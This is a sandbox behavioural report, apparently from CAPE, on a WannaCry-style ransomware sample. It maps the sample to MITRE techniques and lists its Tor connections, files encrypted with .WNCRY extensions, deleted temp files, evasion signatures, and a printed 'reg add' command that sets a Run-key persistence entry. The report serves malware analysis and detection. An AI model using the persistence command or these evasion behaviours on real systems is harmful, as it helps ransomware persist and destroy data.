  • T1064 - Scripting
    • script_tool_executed
  • T1547 - Boot or Logon Autostart Execution
    • persistence_autorun
  • T1547.001 - Registry Run Keys / Startup Folder
    • persistence_autorun
  • T1547 - Boot or Logon Autostart Execution
    • persistence_autorun
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process
  • T1548 - Abuse Elevation Control Mechanism
    • accesses_public_folder
  • T1547.001 - Registry Run Keys / Startup Folder
    • persistence_autorun
  • T1564 - Hide Artifacts
    • stealth_file
    • stealth_window
  • T1202 - Indirect Command Execution
    • uses_windows_utilities
    • suspicious_command_tools
  • T1036 - Masquerading
    • network_connection_via_suspicious_process
    • accesses_public_folder
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process
  • T1112 - Modify Registry
    • creates_largekey
    • persistence_autorun
  • T1548 - Abuse Elevation Control Mechanism
    • accesses_public_folder
  • T1070 - Indicator Removal
    • deletes_files
    • stealth_webhistory
  • T1064 - Scripting
    • script_tool_executed
  • T1564.003 - Hidden Window
    • stealth_window
  • T1070.004 - File Deletion
    • deletes_files
  • T1564.001 - Hidden Files and Directories
    • stealth_file
  • T1082 - System Information Discovery
    • user_discovery
    • antivm_checks_available_memory
  • T1083 - File and Directory Discovery
    • antiav_detectfile
  • T1057 - Process Discovery
    • enumerates_running_processes
  • T1518.001 - Security Software Discovery
    • antiav_detectfile
  • T1518 - Software Discovery
    • antiav_detectfile
  • T1071 - Application Layer Protocol
    • antisandbox_sleep
    • reads_self
    • http_request
    • dynamic_function_loading
    • dead_connect
    • network_bind
    • network_multiple_direct_ip_connections
    • procmem_yara
  • T1090 - Proxy
    • network_tor
  • T1090.003 - Multi-hop Proxy
    • network_tor
  • T1005 - Data from Local System
    • infostealer_browser
  • T1074 - Data Staged
    • accesses_recyclebin
  • T1486 - Data Encrypted for Impact
    • ransomware_file_modifications
    • ransomware_files
    • mass_data_encryption
    • ransomware_like_modify_files
  • T1485 - Data Destruction
    • anomalous_deletefile
  • T1490 - Inhibit System Recovery
    • bcdedit_command

Usage


Processing ( 47.95 seconds )

  • 45.606 CAPE
  • 1.674 BehaviorAnalysis
  • 0.665 Heatmap
  • 0.003 AnalysisInfo
  • 0.002 NetworkAnalysis
  • 0.001 AntiRansomware
  • 0.001 Debug

Signatures ( 0.53 seconds )

  • 0.076 masquerade_process_name
  • 0.046 antiav_detectfile
  • 0.039 ransomware_extensions
  • 0.036 antiav_detectreg
  • 0.036 ransomware_files
  • 0.03 infostealer_bitcoin
  • 0.027 infostealer_ftp
  • 0.025 antidebug_devices
  • 0.018 infostealer_im
  • 0.017 antivm_vbox_files
  • 0.016 antianalysis_detectfile
  • 0.015 territorial_disputes_sigs
  • 0.012 poullight_files
  • 0.011 infostealer_mail
  • 0.008 antianalysis_detectreg
  • 0.006 cryptbot_files
  • 0.005 antivm_vmware_files
  • 0.005 rat_pcclient
  • 0.004 antivm_vbox_devices
  • 0.004 antivm_vbox_keys
  • 0.004 driver_filtermanager
  • 0.004 echelon_files
  • 0.004 qulab_files
  • 0.003 antivm_vmware_keys
  • 0.003 geodo_banking_trojan
  • 0.003 file_credential_store_access
  • 0.003 sniffer_winpcap
  • 0.002 accesses_sysvol
  • 0.002 antiemu_windefend
  • 0.002 antivm_generic_diskreg
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vpc_files
  • 0.002 antivm_xen_keys
  • 0.002 ketrican_regkeys
  • 0.002 banker_cridex
  • 0.002 bitcoin_opencl
  • 0.002 clears_logs
  • 0.002 darkcomet_regkeys
  • 0.002 deletes_executed_files
  • 0.002 network_tor_service
  • 0.002 dcrat_files
  • 0.002 modirat_behavior
  • 0.002 obliquerat_files
  • 0.002 warzonerat_files
  • 0.002 recon_fingerprint
  • 0.002 remcos_files
  • 0.002 targeted_flame
  • 0.002 ursnif_behavior
  • 0.001 accesses_mailslot
  • 0.001 writes_sysvol
  • 0.001 antisandbox_cuckoo_files
  • 0.001 antisandbox_fortinet_files
  • 0.001 antisandbox_joe_anubis_files
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antisandbox_threattrack_files
  • 0.001 antivm_bochs_keys
  • 0.001 antivm_hyperv_keys
  • 0.001 antivm_vpc_keys
  • 0.001 browser_security
  • 0.001 bypass_firewall
  • 0.001 file_credential_store_write
  • 0.001 registry_credential_store_access
  • 0.001 ransomware_like_modify_files
  • 0.001 apocalypse_stealer_file_behavior
  • 0.001 arkei_files
  • 0.001 packer_armadillo_regkey
  • 0.001 persistence_ads
  • 0.001 persistence_shim_database
  • 0.001 limerat_regkeys
  • 0.001 warzonerat_regkeys
  • 0.001 remcos_regkeys
  • 0.001 spicyhotpot_behavior
  • 0.001 spreading_autoruninf
  • 0.001 stealth_webhistory
  • 0.001 web_shell_files
  • 0.001 suspicious_command_tools
  • 0.001 uses_windows_utilities

Reporting ( 0.53 seconds )

  • 0.324 ReportHTML
  • 0.097 LiteReport
  • 0.093 JsonDump
  • 0.01 MITRE_TTPS
  • 0.001 PCAP2CERT

Signatures

Checks available memory
Attempts to connect to a suspicious port
IP: 146.185.177.103:9030 (unknown)
IP: 37.187.102.186:9001 (unknown)
IP: 212.47.229.2:9001 (unknown)
IP: 127.0.0.1:9050
IP: 128.31.0.39:9101 (unknown)
Queries the keyboard layout
A file was accessed within the Public folder.
file: C:\Users\Public\Documents\My Music\*
file: C:\Users\Public\Music\Sample Music
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY
file: C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
file: C:\Users\Public\Downloads\~SDBCCD.tmp
file: C:\Users\Public\Favorites\*
file: C:\Users\Public\Videos\Sample Videos
file: C:\Users\Public\Favorites
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRY
file: C:\Users\Public\Documents\*
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRY
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
file: C:\Users\Public\Pictures\~SDBE1A.tmp
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRY
file: C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
file: C:\Users\Public\Desktop\@WanaDecryptor@.bmp
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures
file: C:\Users\Public\Recorded TV\Sample Media\*
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
file: C:\Users\Public\Libraries\~SDBD1D.tmp
file: C:\Users\Public\Desktop\~SD38ED.tmp
file: C:\Users\Public\~SDBC6C.tmp
file: C:\Users\Public\Documents\My Videos\*
file: C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
file: C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
file: C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
file: C:\Users\Public\Documents\My Pictures\*
file: C:\Users\Public\Downloads\*
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
file: C:\Users\Public\Videos\~SDC0DD.tmp
file: C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
file: C:\Users\Public\Music\~SDBD5D.tmp
file: C:\Users\Public\Desktop
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3
file: C:\Users\Public\Libraries\*
file: C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
file: C:\Users\Public\Recorded TV
file: C:\Users\Public\*
file: C:\Users\Public\Pictures
file: C:\Users\Public\Pictures\*
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
file: C:\Users\Public\Videos
file: C:\Users\Public\Music\Sample Music\*
file: C:\Users\Public\Documents\~SDBC6E.tmp
file: C:\Users\Public\Downloads
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
file: C:\Users\Public\Documents\~SD7464.tmp
file: C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
file: C:\Users\Public\Music\*
file: C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
file: C:\Users\Public\Desktop\desktop.ini
file: C:\Users\Public\Desktop\@WanaDecryptor@.exe
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3
file: C:\Users\Public\Recorded TV\*
file: C:\Users\Public\Libraries
file: C:\Users\Public\Favorites\~SDBCFD.tmp
file: C:\Users\Public\Recorded TV\~SDC05E.tmp
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
file: C:\Users\Public\Videos\*
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
file: C:\Users\Public\Documents
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
file: C:\Users\Public\Videos\Sample Videos\*
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRY
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
file: C:\Users\Public\Recorded TV\Sample Media
file: C:\Users\Public\Desktop\~SD7432.tmp
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
file: C:\Users\Public\Desktop\*
file: C:\Users\Public\desktop.ini
file: C:\Users\Public\Music
file: C:\Users\Public\Desktop\~SDBC6D.tmp
file: C:\Users\Public\Pictures\Sample Pictures\*
SetUnhandledExceptionFilter detected (possible anti-debug)
Checks adapter addresses which can be used to detect virtual network interfaces
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
command: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
Uses Windows APIs to generate a cryptographic key
A file with an unusual extension was attempted to be loaded as a DLL.
Possible date expiration check, exits too soon after checking local time
process: attrib.exe, PID 2544
Anomalous file deletion behavior detected (10+)
file: C:\Users\user\AppData\Local\Temp\00000000.res
file: C:\Users\user\Desktop\~SD7362.tmp
file: C:\Users\user\Documents\~SD73C1.tmp
file: C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
file: C:\Users\Default\Desktop\~SD73F2.tmp
file: C:\Users\Default User\Desktop\~SD7412.tmp
file: C:\Users\Public\Desktop\~SD7432.tmp
file: C:\Users\Default\Documents\~SD7443.tmp
file: C:\Users\Default User\Documents\~SD7454.tmp
file: C:\Users\Public\Documents\~SD7464.tmp
file: C:\~SD7475.tmp
file: C:\$Recycle.Bin\~SD7486.tmp
file: C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
file: C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
file: C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
file: C:\ba69bdf0a250e352360c33\~SD74E7.tmp
file: C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
file: C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
file: C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
file: C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
file: C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
file: C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
file: C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
file: C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
file: C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
file: C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
file: C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
file: C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
file: C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
file: C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
file: C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
file: C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
file: C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
file: C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
file: C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
file: C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
file: C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
file: C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
file: C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
file: C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
file: C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
file: C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
file: C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
file: C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
file: C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
file: C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
file: C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
file: C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
file: C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
file: C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
file: C:\Boot\~SD7866.tmp
file: C:\Boot\cs-CZ\~SD7867.tmp
file: C:\Boot\da-DK\~SD7868.tmp
file: C:\Boot\de-DE\~SD7869.tmp
file: C:\Boot\el-GR\~SD786A.tmp
file: C:\Boot\en-US\~SD787A.tmp
file: C:\Boot\es-ES\~SD787B.tmp
file: C:\Boot\fi-FI\~SD787C.tmp
file: C:\Boot\Fonts\~SD787D.tmp
file: C:\Boot\fr-FR\~SD787E.tmp
file: C:\Boot\hu-HU\~SD787F.tmp
file: C:\Boot\it-IT\~SD7880.tmp
file: C:\Boot\ja-JP\~SD7881.tmp
file: C:\Boot\ko-KR\~SD7882.tmp
file: C:\Boot\nb-NO\~SD7893.tmp
file: C:\Boot\nl-NL\~SD7894.tmp
file: C:\Boot\pl-PL\~SD7895.tmp
file: C:\Boot\pt-BR\~SD7896.tmp
file: C:\Boot\pt-PT\~SD7897.tmp
file: C:\Boot\ru-RU\~SD7898.tmp
file: C:\Boot\sv-SE\~SD7899.tmp
file: C:\Boot\tr-TR\~SD78AA.tmp
file: C:\Boot\zh-CN\~SD78AB.tmp
file: C:\Boot\zh-HK\~SD78AC.tmp
file: C:\Boot\zh-TW\~SD78AD.tmp
file: C:\PerfLogs\~SD78AE.tmp
file: C:\PerfLogs\Admin\~SD78AF.tmp
file: C:\PSTranscripts\~SD78B0.tmp
file: C:\PSTranscripts\20251206\~SD78B1.tmp
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
file: C:\Recovery\~SD78C1.tmp
file: C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
file: C:\Sysmon\~SD78C3.tmp
file: C:\Sysmon\sysmonconfig.txt.WNCRYT
file: C:\Users\~SD78D4.tmp
file: C:\Users\All Users\~SD78D5.tmp
file: C:\Users\All Users\Adobe\~SD78D6.tmp
file: C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
file: C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
file: C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
file: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
file: C:\Users\All Users\Boxstarter\~SD790D.tmp
file: C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
file: C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
file: C:\Users\All Users\chocolatey\~SD7955.tmp
file: C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
file: C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
file: C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
file: C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
file: C:\Users\All Users\chocolatey\config\~SD79FE.tmp
file: C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
file: C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
file: C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
file: C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
file: C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
